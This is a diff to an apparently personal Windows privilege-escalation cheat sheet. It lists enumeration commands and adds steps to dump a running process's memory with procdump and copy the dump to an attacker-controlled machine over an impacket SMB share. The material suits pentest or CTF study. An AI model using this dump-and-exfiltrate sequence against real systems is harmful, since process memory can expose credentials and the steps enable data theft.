AndreMIsidoro/escalations/windows_escalation.md

 	query user		Display active users
 	net accounts		Prints password policy

+	get-process		Enumerates running processes

+		Use procdump https://learn.microsoft.com/en-us/sysinternals/downloads/procdump , to dump the memory of any interesting running process

+			.\procdump.exe -ma <process_id> <output_file>

+		We can use an smb share to download the output_file:

+			on our local machine we do

+			smbserver.py -smb2support -username guest -password guest share <path_to_folder_we_gonna_share>

+			smbserver is a script from impacket

+			on the remote machine we do

+			net use x: \\<our_local_ip>\share /user:guest guest

+			and now we copy the dump file

+			cmd /c "copy <filen_name>.dmp X:\"

 ## Check communication through processess using pipes

 	pipelist.exe /accepteula		enumerate instances of named pipes